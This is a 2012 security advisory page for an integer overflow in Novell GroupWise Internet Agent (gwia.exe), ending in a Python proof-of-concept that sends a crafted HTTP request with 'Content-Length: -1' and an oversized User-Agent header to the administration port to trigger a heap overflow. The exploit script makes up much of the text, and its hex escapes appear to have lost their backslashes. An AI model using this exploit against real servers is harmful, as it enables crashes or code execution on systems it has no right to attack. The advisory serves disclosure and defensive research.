Home / exploits Novell Groupwise 8.0.2 HP3 / 2012 Integer Overflow
Posted on 17 September 2012
##################################################################################### Application: Novell Groupwise Platforms: Windows Version: 8.0.2 HP3 and 2012 Secunia: SA50622 {PRL}: 2012-28 Author: Francis Provencher (Protek Research Lab's) Website: http://www.protekresearchlab.com/ Twitter: @ProtekResearch ##################################################################################### 1) Introduction 2) Report Timeline 3) Technical details 4) The Code ##################################################################################### =============== 1) Introduction =============== Novell, Inc. is a global software and services company based in Waltham, Massachusetts. The company specializes in enterprise operating systems, such as SUSE Linux Enterprise and Novell NetWare; identity, security, and systems management solutions; and collaboration solutions, such as Novell Groupwise and Novell Pulse. Novell was instrumental in making the Utah Valley a focus for technology and software development. Novell technology contributed to the emergence of local area networks, which displaced the dominant mainframe computing model and changed computing worldwide. Today, a primary focus of the company is on developing open source software for enterprise clients. (http://en.wikipedia.org/wiki/Novell) ##################################################################################### ============================ 2) Report Timeline ============================ 2012-02-03 Vulnerability reported to Secunia 2012-09-14 Publication of this advisory ##################################################################################### ============================ 3) Technical details ============================ The vulnerability is caused due to an integer overflow error in GroupWise Internet Agent (gwia.exe) when copying request data and can be exploited to cause a heap-based buffer overflow by e.g. sending a specially crafted request with the "Content-Length" header value set to "-1" to the web-based administration interface (TCP port 9850). Successful exploitation may allow execution of arbitrary code. ##################################################################################### =========== 4) The Code =========== #!/usr/bin/python import sys,os,socket if len(sys.argv) < 3: print "Usage: host,port" sys.exit(0) host=sys.argv[1] port=int(sys.argv[2]) sock=socket.socket(socket.AF_INET,socket.SOCK_STREAM) sock.connect((host,port)) sock.send("x47x45x54x20x2Fx20x48x54x54x50x2Fx31x2Ex30x0Dx0Ax43x6Fx6Ex74x65x6Ex74x2Dx4Cx65x6Ex67x74x68x3Ax20x2Dx31x0Dx0Ax45x78x70x69x72x65x73x3Ax20x4Dx6Fx6Ex2Cx20x30x32x20x4Ax75x6Ex20x31x39x38x32x20x30x30x3Ax30x30x3Ax30x30x20x47x4Dx54x0Dx0Ax46x72x6Fx6Dx3Ax20x61x61x61x61x61x40x61x61x61x61x61x61x61x61x61x61x61x61x61x61x2Ex63x6Fx6Dx0Dx0Ax49x66x2Dx4Dx6Fx64x69x66x69x65x64x2Dx53x69x6Ex63x65x3Ax20x4Dx6Fx6Ex2Cx20x30x32x20x4Ax75x6Ex20x31x39x38x32x20x30x30x3Ax30x30x3Ax30x30x20x47x4Dx54x0Dx0Ax4Cx61x73x74x2Dx4Dx6Fx64x69x66x69x65x64x3Ax20x4Dx6Fx6Ex2Cx20x30x32x20x4Ax75x6Ex20x31x39x38x32x20x30x30x3Ax30x30x3Ax30x30x20x47x4Dx54x0Dx0Ax52x65x66x65x72x65x72x3Ax20x68x74x74x70x3Ax2Fx2Fx77x77x77x2Ex61x61x61x61x61x61x61x61x61x61x61x61x61x61x2Ex63x6Fx6Dx2Fx0Dx0Ax55x73x65x72x2Dx41x67x65x6Ex74x3Ax20x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41x41 print "done!" sock.close()
